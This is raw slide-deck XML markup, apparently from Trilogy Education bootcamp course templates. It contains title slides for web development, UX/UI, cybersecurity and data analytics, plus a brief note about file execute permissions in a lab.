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11" r:id="rId1"/>
    <p:sldMasterId id="2147483712" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId31"/>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Lst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:italic r:id="rId41"/>
      <p:boldItalic r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId43"/>
      <p:bold r:id="rId44"/>
      <p:italic r:id="rId45"/>
      <p:boldItalic r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId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491A776-6A95-44DE-A382-5E3810DD701D}">
  <a:tblStyle styleId="{4491A776-6A95-44DE-A382-5E3810DD701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8.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.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font" Target="fonts/font19.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heme" Target="theme/theme1.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6.xml"/><Relationship Id="rId51"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8.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;ge94d1b9472_1_1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1" name="Google Shape;1061;ge94d1b9472_1_1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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172" name="Google Shape;1172;ge94d1b9472_3_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3" name="Google Shape;1173;ge94d1b9472_3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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;ge94d1b9472_3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3" name="Google Shape;1183;ge94d1b9472_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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198" name="Google Shape;1198;ge94d1b9472_3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9" name="Google Shape;1199;ge94d1b9472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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;ge94d1b9472_1_13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8" name="Google Shape;1208;ge94d1b9472_1_1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e94d1b9472_3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e94d1b9472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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;ge94d1b9472_1_13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0" name="Google Shape;1240;ge94d1b9472_1_13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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Google Shape;1246;ge94d1b9472_1_13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7" name="Google Shape;1247;ge94d1b9472_1_13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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1257" name="Google Shape;1257;ge94d1b9472_3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8" name="Google Shape;1258;ge94d1b9472_3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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;ge94d1b9472_1_14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8" name="Google Shape;1268;ge94d1b9472_1_1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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;ge94d1b9472_3_6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7" name="Google Shape;1277;ge94d1b9472_3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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;ge94d1b9472_1_12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7" name="Google Shape;1067;ge94d1b9472_1_12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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;ge94d1b9472_1_14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3" name="Google Shape;1283;ge94d1b9472_1_14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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;ge94d1b9472_1_14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3" name="Google Shape;1293;ge94d1b9472_1_14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JACK</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e94d1b9472_1_14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e94d1b9472_1_14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Leslie: 22-27</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e94d1b9472_1_14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e94d1b9472_1_1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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1317" name="Google Shape;1317;ge94d1b9472_1_14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8" name="Google Shape;1318;ge94d1b9472_1_14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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1325" name="Google Shape;1325;ge94d1b9472_1_14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6" name="Google Shape;1326;ge94d1b9472_1_14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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333" name="Google Shape;1333;ge94d1b9472_1_14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4" name="Google Shape;1334;ge94d1b9472_1_14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Remember that I did this and now won’t be able to execute my payload unless I go back and give executable rights to everybody.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ge94d1b9472_1_14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2" name="Google Shape;1342;ge94d1b9472_1_14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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Google Shape;1349;ge94d1b9472_1_14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0" name="Google Shape;1350;ge94d1b9472_1_14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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;ge94d1b9472_1_12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4" name="Google Shape;1094;ge94d1b9472_1_12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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;ge94d1b9472_1_130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0" name="Google Shape;1100;ge94d1b9472_1_1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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107;ge94d1b9472_1_13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8" name="Google Shape;1108;ge94d1b9472_1_1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ge94d1b9472_1_13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ge94d1b9472_1_13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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;ge94d1b9472_1_13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4" name="Google Shape;1124;ge94d1b9472_1_1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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;ge94d1b9472_1_13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2" name="Google Shape;1132;ge94d1b9472_1_1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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;ge94d1b9472_1_13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2" name="Google Shape;1152;ge94d1b9472_1_1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 Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 52"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Google Shape;53;p14"/>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54" name="Google Shape;54;p14"/>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14"/>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
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p14"/>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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Google Shape;57;p14"/>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58" name="Google Shape;58;p14"/>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 name="Google Shape;59;p14"/>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 name="Google Shape;60;p14"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Google Shape;61;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776110" y="1231212"/>
            <a:ext cx="2286002" cy="1703068"/>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2. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 62"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Google Shape;63;p15"/>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64" name="Google Shape;64;p15"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Google Shape;66;p15"/>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67" name="Google Shape;67;p15"/>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 name="Google Shape;68;p15"/>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 name="Google Shape;69;p15"/>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70" name="Google Shape;70;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584735" y="1058550"/>
            <a:ext cx="2560322" cy="1920238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;71;p15"/>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3. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Google Shape;73;p16"/>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74" name="Google Shape;74;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="3807100"/>
            <a:ext cx="8596200" cy="1062000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>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6"/>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Cybersecurity Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Google Shape;76;p16"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p16"/>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 name="Google Shape;78;p16"/>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 name="Google Shape;79;p16"/>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80" name="Google Shape;80;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678010" y="1152144"/>
            <a:ext cx="2286002" cy="1691641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p16"/>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4. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2489" b="2498"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p17"/>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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899747" y="3982500"/>
            <a:ext cx="822959" cy="711201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Google Shape;86;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="678010" y="1193200"/>
            <a:ext cx="2286002" cy="1691641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274800" y="3982500"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="1188700" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Data Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="4319775"/>
            <a:ext cx="8344500" cy="319200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="9125" rIns="1188700" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>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 name="Google Shape;89;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1828800"/>
            <a:ext cx="8595300" cy="1248000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2880350" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="28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 name="Google Shape;90;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="3447025"/>
            <a:ext cx="8344500" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="3200400" tIns="9125" rIns="274300" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206300" y="4868750"/>
            <a:ext cx="8663400" cy="185700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="0" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>© 2019 Trilogy Education Services, Inc. </a:t>
            </a:r>
